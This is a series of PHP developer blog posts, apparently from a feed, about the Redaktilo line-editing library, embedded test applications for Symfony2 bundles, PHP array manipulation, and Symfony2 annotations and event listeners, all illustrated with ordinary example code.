If the manipulations provided out of the box aren't sufficient, you can create
your own Command, register it in CommandInvoker and it will be available
directly from the Editor!
Commands rely on user input, which is why Loïck worked on InputSanitizer to
validate it. If the ones provided aren't enough, you can still create your own
implementations.
Finally, I'd like to highlight Wouter's work on the EditorFatory helper: it is
really cumbersome to instantiate manually Editor... But thanks to this
factory, you'll never have to do it by yourself!
Note: Working on a Symfony2 project? You can use RedaktiloBundle, which also provides tags to register custom search strategies and commands.
Loïck is currently improving the library's exceptions for the version 1.4.
For version 1.5, two new methods will be added to Text:
incrementCurrentLineNumber and decrementCurrentLineNumber, to avoid the
following:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/monty-python.txt');
// Currently
$currentLineNumber = $file->getCurrentLineNumber();
$file->setCurrentLineNumber($currentLineNumber + 2);
// Soon...
$file->incrementCurrentLineNumber(2);
For the final version 1.6, a strong documentation of the deprecations will be done, leading the way to version 2.0 where those will be removed (50% of the code base will vanish!).
Note: As I'm using Redaktilo everyday, I might discover new improvements to be done, leading the given version numbers above to change.
A question I've been often asked, because describing Redaktilo as a text editor might be a bit misleading. It is a library which feels like an editor, but it is in no way an actual editor you might run.
Here's an example of what you might be doing currently without Redaktilo:
<?php
$lines = file('/tmp/monty-python.txt');
$currentLineNumber = 42;
$section = array_slice($lines, 0, $current, true); // Lines from 0 to 42
$reversedSection = array_reverse($section, true);
$found = preg_grep('/a knewt/', $reversedSection); // finding the first occurence, above line 42
$currentLineNumber = key($found);
array_splice($lines, $currentLineNumber + 1, 0, 'new line below "a knewt"');
$content = implode("\n", $lines); // Let's hope it wasn't a file created on Windows.
file_put_contents($content, '/tmp/monty-python');
With redaktilo:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/monty-python');
$editor->jumpAbove($file, '/a knewt/', 42);
$editor->insertBelow($file, 'new line below "a knewt"');
$editor->save($file);
Because the code example on the README is about inserting a new line in the
AppKernel file of a Symfony2 application, I also get this question.
Redaktilo can edit any text file, so it includes source files. But keep in mind that it only manipulates lines, when you might want to manipulate an AST to edit code.
I'm working on a new silly project: Medio. It heavily relies on Redaktilo to actually edit code: so you can make a code editor with it, but again before you start ask yourself if an AST wouldn't be better.
Redaktilo is a library which makes line manipulation dead easy! It provides extension points and will soon reach version 2 which will mark its final maturity point.
Until then, you can still use it safely, it's been stable for 11 releases now.
]]>TL;DR: Create an empty application in your bundle to allow people to test it (manually or automatically) outside of an actual application.
Symfony2 bundles are a great way to:
In this article, we will see how to make sure a third party bundle actually work by creating an embed application. We will then have a look at its practical use:
Creating a bundle is fairly easy as you just need to create the following class:
<?php
// File: AcmeStandaloneBundle.php
namespace Acme\StandaloneBundle;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\HttpKernel\Bundle\Bundle;
class AcmeStandaloneBundle extends Bundle
{
}
It also needs a composer.json file, so it can be distributed all around the
world:
{
"name": "acme/standalone-bundle",
"type": "symfony-bundle",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\StandaloneBundle\\": ""
}
},
"require": {
"symfony/http-kernel": "~2.3"
}
}
Note: to release it, you would then need to create a git repository and to register it in Packagist.
Now how can we make sure our bundle would work in an application? We could:
app/AppKernel.php file and have a look...But we can do better!
We can create the smallest Symfony2 application ever inside our bundle:
<?php
// File: Tests/app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Acme\StandaloneBundle\AcmeStandaloneBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config.yml');
}
}
FrameworkBundle requires the following configuration parameter in order to work:
# File: Tests/app/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
I'd also advise you to create an autoload file to make things easier:
<?php
// File: Tests/app/autoload.php
$loader = require __DIR__.'/../../vendor/autoload.php';
require __DIR__.'/AppKernel.php';
The last step is to add the new dependency in the composer.json file:
{
"name": "acme/standalone-bundle",
"type": "symfony-bundle",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\StandaloneBundle\\": ""
}
},
"require": {
"symfony/http-kernel": "~2.3"
},
"require-dev": {
"symfony/framework-bundle": "~2.3"
}
}
We would also need to ignore the following directories:
# File: .gitignore
/Tests/app/cache
/Tests/app/logs
And that's it, we now have a minimalistic embed application in our bundle. As it can now be ran on its own, it has become a Standalone Bundle!
Let's see the practical use.
Because your bundle now doesn't need any existing applications to be used, people will be able to test it manually and do some demonstrations with it.
Let's pretend we created a command in our bundle. We'd like to run it just to make sure everything works as expected. For this we'll need to create an embed console:
<?php
// File: Tests/app/console.php
set_time_limit(0);
require_once __DIR__.'/autoload.php';
use Symfony\Bundle\FrameworkBundle\Console\Application;
$kernel = new AppKernel('dev', true);
$application = new Application($kernel);
$application->run();
That's it! You can now run:
php Tests/app/console.php
Let's pretend we created a controller which returns some JSON data. We'd like to browse it just to make sure everyting works as expected. For this, we'll need to create an embed web app:
<?php
// File: Tests/app/web.php
use Symfony\Component\HttpFoundation\Request;
require_once __DIR__.'/autoload.php';
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
That's it! You can now run:
php Tests/app/console.php server:run -d Tests/app
And browse your application.
Note: If you use a templating engine like Twig to render HTML pages, or if you use the Symfony2 Form Component in your bundle, don't forget to add the dependencies to your
composer.jsonfile and to register the appropriate bundles to the embedAppKernel.
Manual tests are great to get a quick idea of what your bundle does. But an embed application is also great to write automated tests.
Let's pretend we created a service which is defined in the DIC. We'd like to make sure it is properly configured (for e.g. checking if we forgot to inject a dependency). For this, we'll need to created a simple test:
<?php
// File: Tests/ServiceTest.php
namespace Acme\StandaloneBundle\Tests;
class ServiceTest extends \PHPUnit_Framework_TestCase
{
private $container;
protected function setUp()
{
$kernel = new \AppKernel('test', true);
$kernel->boot();
$this->container = $kernel->getContainer();
}
public function testServiceIsDefinedInContainer()
{
$service = $this->container->get('acme_standalone.service');
$this->assertInstanceOf('Acme\StandaloneBundle\Service', $service);
}
}
We need to add PHPUnit as a development dependency:
{
"name": "acme/standalone-bundle",
"type": "symfony-bundle",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\StandaloneBundle\\": ""
}
},
"require": {
"symfony/http-kernel": "~2.3"
},
"require-dev": {
"symfony/framework-bundle": "~2.3",
"phpunit/phpunit": "~4.3"
}
}
Finally we need to configure PHPUnit to use our autoload:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/4.3/en/appendixes.configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.3/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="./Tests/app/autoload.php"
>
<testsuites>
<testsuite name="Test Suite">
<directory>./Tests/</directory>
</testsuite>
</testsuites>
</phpunit>
That's it! You can now run:
./vendor/bin/phpunit
Note: You can of course use any testing framework of your choice.
Let's pretend we created a command. We'd like to run it automatically and check its exit code to make sure it works. For this, we'll need to created a simple test:
<?php
// File: Tests/ServiceTest.php
namespace Acme\StandaloneBundle\Tests\Command;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Input\ArrayInput;
use Symfony\Component\Console\Output\NullOutput;
class DemoCommandTest extends \PHPUnit_Framework_TestCase
{
private $application;
protected function setUp()
{
$kernel = new AppKernel('dev', true);
$this->application = new Application($kernel);
}
public function testItRunsSuccessfully()
{
$output = new NullOutput();
$input = new ArrayInput(
'command_name' => 'acme:demo',
'argument' => 'value',
'--option' => 'value',
);
$exitCode = $this->application->run($input, $output);
$this->assertSame(0, $exitCode);
}
}
And that's it!
Let's pretend we created a controller which returns some JSON data. We'd like to browse it automatically and check its status code to make sure it works. For this, we'll need to created a simple test:
<?php
// File: Tests/ServiceTest.php
namespace Acme\StandaloneBundle\Tests\Controller;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Input\ArrayInput;
use Symfony\Component\Console\Output\NullOutput;
class DemoControllerTest extends \PHPUnit_Framework_TestCase
{
private $client;
protected function setUp()
{
$kernel = new AppKernel('test', true);
$kernel->boot();
$this->client = $kernel->getContainer()->get('test.client');
}
public function testItRunsSuccessfully()
{
$headers = array('CONTENT_TYPE' => 'application/json');
$content = array('parameter' => 'value');
$response = $this->client->request(
'POST',
'/demo',
array(),
array(),
$headers,
$content
);
$this->assertTrue($response->isSuccessful());
}
}
The test.client service is only available when the test configuration
parameter is set.
# File: Tests/app/config.yml
framework:
secret: "Three can keep a secret, if two of them are dead."
test: ~
And that's it!
Note: When creating APIs, you might want to test the precise status code.
Creating an embed application in a third party bundle is fairly easy and brings many advantages as it enables demonstrations and simple automated tests.
I hope you enjoyed this article, if you have any questions or comments, please let me know.
]]>TL;DR: Redaktilo provides a nice API to manipulate array of lines (insert, replace, go to line, etc).
Arrays are surely one of the most used PHP functionality: they're simple, convenient and benefit from a large set of standard functions to manipulate them.
Let's see the different possibilities:
In order to find the index of a string in an array, we can use one of the following functions:
<?php
$montyPython = array(
'This is a dead parrot',
'No, no, it\'s not dead, it\'s resting!',
);
$exactSentence = 'This is a dead parrot';
array_search($exactSentence, $montyPython, true); // Returns 0
$regex = '/resting!$/';
$found = preg_grep($regex, $montyPython);
key($found); // Returns 1
Note: The third parameter of
array_searchenables the strict comparison (it makes sure the types are also the same).
We can find the matching elements of a pattern using
preg_grep. To get the index of the first result
found, we can use key.
It's great! Now what if we want to remember the index and then make a search
relatively to it? For example we want to find the index of the element
/a knewt/, but only in the elements above ... I got better...:
<?php
$holyGrail = array(
'She turned me into a knewt!',
'A knewt?',
'... I got better...',
'A WITCH!',
);
$index = array_search('... I got better...', $holyGrail, true);
$section = array_slice($holyGrail, 0, $index, true);
$reversedSection = array_reverse($section, true);
$found = preg_grep('/a knewt/', $reversedSection);
key($found); // Returns 0
In this code snippet, we get a subset of the array
(from the first element to ... I got better) using
array_slice (the last argument allows to keep
the indexes unchanged). This also excludes ... I got better....
Then we change the order of the elements using
array_reverse (the second argument allows to
keep the index unchanged) so the element above ... I got better... would be
the first result.
Finally we look for /a knewt/ as we did previously.
If we want to insert a new element after a given index in the array, we need to
use array_splice:
<?php
$grandPiano = array(
'I would like to learn how to fly an aeroplane',
'A what?',
'An aeroplane',
'OH! An aeroplane, oh I say we are grand aren\'t we?',
'Pardon me while I\'m flying me aeroplane... NOW GET ON THE TABLE!',
);
$found = preg_grep('/grand/', $grandPiano);
$index = key($found);
array_splice($grandPiano, $index + 1, 0, 'No more cluttered cream for me, butler, I\'m off to play the grand piano');
Actually array_splice allows to replace a subsection of an array, here's the
explanation of its arguments:
0 means replacing nothing, therefore just inserting)It's not very explicit, but we have a solution for this (keep reading to find out).
Here's an easy one:
<?php
$parrot = array(
'Hello, I would like to make a complain. Hello, miss?',
'What do you mean miss?',
'Sorry, I have a cold',
);
$index = array_search('Sorry, I have a cold', $parrot, true);
unset($parrot[$index]);
You might want to reorder the indexes, to avoid gaps:
<?php
$parrot = array(
'Hello, I would like to make a complain. Hello, miss?',
'What do you mean miss?',
'Sorry, I have a cold',
);
$index = array_search('What do you mean miss?', $parrot, true);
unset($parrot[$index]);
// Current value:
// $parrot = array(
// 0 => 'Hello, I would like to make a complain. Hello, miss?',
// 2 => 'Sorry, I have a cold',
// );
$parrot = array_values($parrot);
// Current value:
// $parrot = array(
// 0 => 'Hello, I would like to make a complain. Hello, miss?',
// 1 => 'Sorry, I have a cold',
// );
The array_values function is equivalent to:
$newArray = array();
foreach ($oldArray as $element) {
$newArray[] = $element;
}
Until now, we've been using a hard coded array, but this is rarely what we encounter in real life project. The data could for example come from a file, which can be transformed into an array of lines:
<?php
$file = file('/tmp/holy-grail.text', FILE_IGNORE_NEW_LINES);
Note: the second argument will remove the trailing line breaks.
The only problem with file is that it will remove the
last line if it's empty. Let's use another function:
<?php
$content = file_get_contents('/tmp/holy-grail.txt');
$lines = explode("\n", $content);
The file_get_contents function returns the
content as a string.
We used explode to split it into an array of lines.
This assumes that the file hasn't been created on Windows (where the line
separator is \r\n)... We need to detect the line break:
<?php
$content = @file_get_contents('/tmp/holy-grail.txt');
$lineBreak = "\n"; // Used by every systems (except Windows), so used as default
if (false === strpos($content, "\n")) { // No line break detected at all
$lineBreak = PHP_EOL; // Using the system's one
}
if (false !== strpos($content, "\r\n")) { // Windows line break detected
$lineBreak = "\r\n";
}
$lines = explode($lineBreak, $content);
Note: There's many check to be done before actually reading the file (does the file actually exists? Do we have the permission to read it?). We have a solution for this (keep reading to find out).
If we do any changes to those lines, we might want to save them on the filesystem:
<?php
$lines = array(
'Morning, morning, morning',
'Morning Jim, Morning Jack',
'Can\'t complain, keep coming back',
'Boring, boring, boring',
);
$lineBreak = "\n"; // Or whatever has been detected
$content = implode($lineBreak, $lines);
file_put_contents('/tmp/silly-walk-song.txt', $content);
To convert back the array of lines to a string content, we use
implode.
To write the content in the file, we use
file_put_contents.
Note: There's many check to be done before actually writing in a file (does the path actually exists? Do we have the permissions? What happens if the writing process fails during the execution?). To solve this, use the Symfony2 Filesystem Component (
Filesystem#dumpFile()).
You don't find array_splice very explicit for element insertion (or can't find
a way to remember its argument order/meaning)?
Keeping the elements, the index, the line break in separates variables looks too procedural for you?
And what about error management?
Don't panic! There is a better way: Redaktilo (it means "Editor" in esperanto).
This small library makes array manipulation easier by providing:
Editor object (open, save, find, insert, etc)Text object (line break, elements, current index, etc)File object (same as Text, but with filename)Use it in your projects, thanks to Composer:
composer require 'gnugat/redaktilo:~1.1'
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
Note: In order to make operations more explicit, Redaktilo has adopted the vocabulary of file edition (more specifically manipulation of lines). But in the end it's still array manipulation.
You don't have to worry about file checking and line break detection anymore:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/silly-walk-song.txt');
$file->getLineBreak(); // Returns "\n" if the file hasn't been created on Windows
Redaktilo takes care of the search strategy for you (it uses preg_grep when
you give a valid regular expression, and array_search when you give a string).
It supports search relative to the current line number stored in the given
Text and File (it uses array_slice, array_reverse and key internally).
The hasAbove and hasBelow methods just return a boolean, while the
jumpAbove and jumpBelow methods rather store the found line number in the
given Text and File (and raise an exception if nothing is found):
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/silly-walk-song.txt');
$editor->jumpBelow($file, 'Boring, boring, boring');
$file->getCurrentLineNumber(); // Returns 3
$editor->hasAbove($file, '/morning,/'); // Returns true
Note:
hasAbove,hasBelow,jumpAboveandjumpBelowall have a third argument which is a line number. If provided, the search will be done relatively to this line number, rather than to the current one.For example, checking the presence of a pattern in the whole file can be done as:
$editor->hasBelow($file, $pattern, 0); // starts the search from the top of the file.
No more array_splice nonsense!
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
$editor = EditorFactory::createEditor();
$file = $editor->open('/tmp/silly-walk-song.txt');
$editor->insertAbove($file, 'The silly walk song');
Note:
insertAbove,insertBelow,replaceandremoveall have a third argument which is a line number. If provided, the anipulation will be done relatively to it, instead of relatively to the current one.
If you're not manipulating a file, you can use Text just like we used
File:
<?php
require __DIR__.'/vendor/autoload.php';
use Gnugat\Redaktilo\EditorFactory;
use Gnugat\Redaktilo\Service\LineBreak;
use Gnugat\Redaktilo\Service\TextFactory;
$lineBreak = new LineBreak();
$textFactory = new TextFactory($lineBreak);
$text = $textFactory->make(<<<EOF
Some raw text you would have got from somewhere,
for example a database.
EOF
);
$editor = EditorFactory::createEditor();
$editor->hasBelow($text, '/a database/'); // Returns true
There's many more operations available, as you can discover in the documentation.
To make it easier, here's some cheat sheet.
<?php
namespace Gnugat\Redaktilo;
use Gnugat\Redaktilo\Search\PatternNotFoundException;
use Gnugat\Redaktilo\Search\SearchEngine;
use Gnugat\Redaktilo\Service\Filesystem;
use Symfony\Component\Filesystem\Exception\FileNotFoundException;
use Symfony\Component\Filesystem\Exception\IOException;
class Editor
{
public function open($filename, $force = false); // @throws FileNotFoundException
public function save(File $file); // @throws IOException If cannot write
// @throw PatternNotFoundException
public function jumpAbove(Text $text, $pattern, $location = null);
public function jumpBelow(Text $text, $pattern, $location = null);
// @return bool
public function hasAbove(Text $text, $pattern, $location = null);
public function hasBelow(Text $text, $pattern, $location = null);
public function insertAbove(Text $text, $addition, $location = null);
public function insertBelow(Text $text, $addition, $location = null);
public function replace(Text $text, $replacement, $location = null);
public function remove(Text $text, $location = null);
}
<?php
namespace Gnugat\Redaktilo;
class Text
{
public function getLines();
public function setLines(array $lines);
public function getLength();
public function getLineBreak();
public function setLineBreak($lineBreak);
public function getCurrentLineNumber();
// @throw InvalidLineNumberException
public function setCurrentLineNumber($lineNumber);
public function getLine($lineNumber = null);
public function setLine($line, $lineNumber = null);
}
<?php
namespace Gnugat\Redaktilo;
class File extends Text
{
public function getFilename();
public function setFilename($filename);
}
PHP provides plenty of built-in functions to manipulate arrays, but those are not enough. Redaktilo is a small library which provides a nicer API.
It allows you to select a line relatively to the current one and then do CRUD operations on it.
I hope you'll find it as usefull as I do and if you find any bug or have any proposals feel free to do so on Github where Loïck Piera and myself will both be glad to help you.
]]>Note: As for the 15/10/2014, the current version of Redaktilo is 1.1.6 (stable). Future updates are already planned!
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the conclusion of the series on mastering the Symfony2 framework. Have a look at the five articles:
It quickly sums up what we've seen and provides some directions to the next steps, for those interrested in learning more (there's always more!).
In these 6 articles, we've learned how to master Symfony2 through:
As a bonus, we've also seen:
There's still a deal lot more to learn, but with this series we've hopefully seen the strict minimum to create any day to day application with deep knowledge on how to extend the framework and where to put our code.
We've seen Symfony as a full stack framework: it deals with the HTTP protocol for you. But the truth is that Symfony is a collection of third party libraries before anything else. Here's a short selection of its available components:
Do you want to go further? Then have a look a these fabulous resources:
Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the sixth article of the series on mastering the Symfony2 framework. Have a look at the four first ones:
In the previous articles we created an API allowing us to submit and list quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── doctrine.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── console
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── DependencyInjection
│ │ └── FortuneApplicationExtension.php
│ ├── Entity
│ │ ├── QuoteFactory.php
│ │ ├── QuoteGateway.php
│ │ ├── Quote.php
│ │ └── QuoteRepository.php
│ ├── EventListener
│ │ └── SubmitJsonListener.php
│ ├── FortuneApplicationBundle.php
│ ├── Resources
│ │ └── config
│ │ ├── doctrine
│ │ │ └── Quote.orm.yml
│ │ └── services.xml
│ └── Tests
│ ├── Controller
│ │ └── QuoteControllerTest.php
│ └── Entity
│ └── QuoteRepositoryTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this article, we'll discover annotations.
Inspired by Python Decorators and Java Annotations, the Doctrine Project created a convenient library allowing to put in the same file: information (like configuration) and source code.
In concrete terms, Annotations
are comments which are read by AnnotationReader and can then be cached in any
format (generally PHP) to make things faster afterwards.
It's main strength is the possibility to avoid having a configuration file in a
path too far from the source code which uses it. For example intead of having
the schema definition in src/Fortune/ApplicationBundle/Resources/config/doctrine/Quote.orm.yml
we could have it directly in the QuoteEntity.
The Sensio FrameworkExtra Bundle
provides controller annotations, amongst them lies @Route allowing us to move
the routing configuration from app/config/routing.yml directly to the actions.
Let's download the bundle:
composer require sensio/framework-extra-bundle:~3.0
Then register it:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Symfony\Bundle\FrameworkBundle\FrameworkBundle(),
new Fortune\ApplicationBundle\FortuneApplicationBundle(),
new Doctrine\Bundle\DoctrineBundle\DoctrineBundle(),
new Sensio\Bundle\FrameworkExtraBundle\SensioFrameworkExtraBundle(),
);
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load(__DIR__.'/config/config_'.$this->getEnvironment().'.yml');
}
}
Finally, we need to tell Doctrine's Annotation library where to find the classes by registering Composer's autoloader:
<?php
// File: app/autoload.php
use Doctrine\Common\Annotations\AnnotationRegistry;
$loader = require __DIR__.'/../vendor/autoload.php';
AnnotationRegistry::registerLoader(array($loader, 'loadClass'));
return $loader;
This file should be used in our front controller:
<?php
use Symfony\Component\HttpFoundation\Request;
require_once __DIR__.'/app/autoload.php';
require_once __DIR__.'/../app/AppKernel.php';
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
But also in our test suite:
<?xml version="1.0" encoding="UTF-8"?>
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit
backupGlobals="false"
colors="true"
syntaxCheck="false"
bootstrap="autoload.php">
<testsuites>
<testsuite name="Functional Test Suite">
<directory>../src/*/*/Tests</directory>
</testsuite>
</testsuites>
</phpunit>
We can now empty the routing.yml file and tell it to import the configuration
from the QuoteController using its annotations:
# File: app/config/routing.yml
fortune_application:
resource: @FortuneApplicationBundle/Controller
type: annotation
The controller itself will look like this:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
/**
* @Route("/api/quotes", methods={"POST"})
*/
public function submitAction(Request $request)
{
$postedValues = $request->request->all();
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
/**
* @Route("/api/quotes", methods={"GET"})
*/
public function listAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quotes = $quoteRepository->findAll();
return new JsonResponse($quotes, Response::HTTP_OK);
}
}
And now annotations are ready to be used, as the tests prove it:
./vendor/bin/phpunit -c app
That's green enough for us to commit:
git add -A
git commit -m 'Used annotations'
Annotations allow us to remove the distance between configuration and code.
Note: You should know that annotations can raise concerns about tight coupling, but it doesn't seem to be relevant when used as configuration.
The best thing to do is to minimize their use to the classes which are already coupled to our tools (for example the controllers) and do some research on the subject to make your own opinion.
If the concept seduced you, have a look a ControllerExtraBundle.
The next artile will be the conclusion, I hope you enjoy this series!
]]>Deprecated: This series has been re-written - see The Ultimate Developer Guide to Symfony
This is the fifth article of the series on mastering the Symfony2 framework. Have a look at the four first ones:
In the previous articles we created an API allowing us to submit and list quotes:
.
├── app
│ ├── AppKernel.php
│ ├── cache
│ │ └── .gitkeep
│ ├── config
│ │ ├── config_prod.yml
│ │ ├── config_test.yml
│ │ ├── config.yml
│ │ ├── doctrine.yml
│ │ ├── parameters.yml
│ │ ├── parameters.yml.dist
│ │ └── routing.yml
│ ├── logs
│ │ └── .gitkeep
│ └── phpunit.xml.dist
├── composer.json
├── composer.lock
├── src
│ └── Fortune
│ └── ApplicationBundle
│ ├── Controller
│ │ └── QuoteController.php
│ ├── DependencyInjection
│ │ └── FortuneApplicationExtension.php
│ ├── Entity
│ │ ├── QuoteFactory.php
│ │ ├── QuoteGateway.php
│ │ ├── Quote.php
│ │ └── QuoteRepository.php
│ ├── FortuneApplicationBundle.php
│ ├── Resources
│ │ └── config
│ │ ├── doctrine
│ │ │ └── Quote.orm.yml
│ │ └── services.xml
│ └── Tests
│ ├── Controller
│ │ └── QuoteControllerTest.php
│ └── Entity
│ └── QuoteRepositoryTest.php
└── web
└── app.php
Here's the repository where you can find the actual code.
In this one we'll learn how to extend the framework using events.
The Event Dispatcher is another standalone component which can be summed up as follow:
<?php
class EventDispatcher
{
private $events = array();
public function addListener($event, $listener)
{
$this->events[$event][] = $listener;
}
public function dispatch($event)
{
foreach ($this->events[$event] as $listener) {
$listener();
}
}
}
You can register listeners (which are callables) and then call them by dispatching the subscribed event:
$dispatcher = new EventDispatcher();
$dispatcher->addListener('before.boyard', function () { echo 'Ultimate Challenge'; });
$dispatcher->dispatch('before.boyard'); // Prints "Ultimate Challenge".
Here's the actual API:
<?php
namespace Symfony\Component\EventDispatcher;
interface EventDispatcherInterface
{
public function dispatch($eventName, Event $event = null);
public function addListener($eventName, $listener, $priority = 0);
public function removeListener($eventName, $listener);
public function getListeners($eventName = null);
public function hasListeners($eventName = null);
public function addSubscriber(EventSubscriberInterface $subscriber);
public function removeSubscriber(EventSubscriberInterface $subscriber);
}
The Component handles priorities, and contrary to our previous example it needs
an Event object when dispatching events, allowing us to provide a context.
Subscribers are listeners which have a getSubscribedEvents method.
Note: If you want to learn more about this component, have a look at Raul Fraile's article.
The Symfony2 HttpKernel Component dispatches events to provide extension points, we can:
Note: exceptions are caught by default, but this can be disabled.
Here's the full list of kernel events.
Note: If you want to learn more about those events, have a look at Matthias Noback's book: A year with Symfony.
The FrameworkBundle takes care of registering the listeners using the Dependency Injection Container (DIC): we declare our listener as a service in the configuration, with a specific tag.
Note: the DIC can retrieve all the services with the given tag using
findTaggedServiceIds, making it easier to register listeners for example
(this is done in Symfony\Component\EventDispatcher\DependencyInjection\RegisterListenersPass
which is called in the FrameworkBundle).
In QuoteController::submitAction, we need to get the request's content and
convert it from JSON. This is a generic task which should be executed before
every controller: we can move it in an event listener.
First create the directory:
mkdir src/Fortune/ApplicationBundle/EventListener
Then we create the actual listener:
<?php
// File: src/Fortune/ApplicationBundle/EventListener/SubmitJsonListener.php
namespace Fortune\ApplicationBundle\EventListener;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class SubmitJsonListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$content = $request->getContent();
$data = json_decode($content, true);
$request->request->add($data ?: array());
}
}
Next we register it in the Dependency Injection Container:
<?xml version="1.0" ?>
<!-- File: src/Fortune/ApplicationBundle/Resources/config/services.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="fortune_application.quote_factory"
class="Fortune\ApplicationBundle\Entity\QuoteFactory"
>
</service>
<service id="fortune_application.quote_gateway"
class="Fortune\ApplicationBundle\Entity\QuoteGateway"
factory-service="doctrine"
factory-method="getRepository">
<argument>FortuneApplicationBundle:Quote</argument>
</service>
<service id="fortune_application.quote_repository"
class="Fortune\ApplicationBundle\Entity\QuoteRepository"
>
<argument type="service" id="fortune_application.quote_gateway" />
<argument type="service" id="fortune_application.quote_factory" />
</service>
<service id="fortune_application.submit_json_listener"
class="Fortune\ApplicationBundle\EventListener\SubmitJsonListener"
>
<tag name="kernel.event_listener" event="kernel.request" method="onKernelRequest" />
</service>
</services>
</container>
And finally we update the controller:
<?php
// File: src/Fortune/ApplicationBundle/Controller/QuoteController.php
namespace Fortune\ApplicationBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
class QuoteController extends Controller
{
public function submitAction(Request $request)
{
$postedValues = $request->request->all();
if (empty($postedValues['content'])) {
$answer = array('message' => 'Missing required parameter: content');
return new JsonResponse($answer, Response::HTTP_UNPROCESSABLE_ENTITY);
}
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quote = $quoteRepository->insert($postedValues['content']);
return new JsonResponse($quote, Response::HTTP_CREATED);
}
public function listAction(Request $request)
{
$quoteRepository = $this->container->get('fortune_application.quote_repository');
$quotes = $quoteRepository->findAll();
return new JsonResponse($quotes, Response::HTTP_OK);
}
}
We can now run the tests:
./vendor/bin/phpunit -c app
No regression detected! We can commit our work:
git add -A
git ci -m 'Used event'
Note: The FOSRestBundle provides such an event listener. We're only creating it manually here to learn about events.
If someone submits a malformed JSON, our listener can stop the execution and return a proper response:
<?php
// File: src/Fortune/ApplicationBundle/EventListener/SubmitJsonListener.php
namespace Fortune\ApplicationBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class SubmitJsonListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$content = $request->getContent();
$data = json_decode($content, true);
if (JSON_ERROR_NONE !== json_last_error()) {
$data = array('message' => 'Invalid or malformed JSON');
$response = new JsonResponse($data, Response::HTTP_BAD_REQUEST);
$event->setResponse($response);
$event->stopPropagation();
}
$request->request->add($data ?: array());
}
}
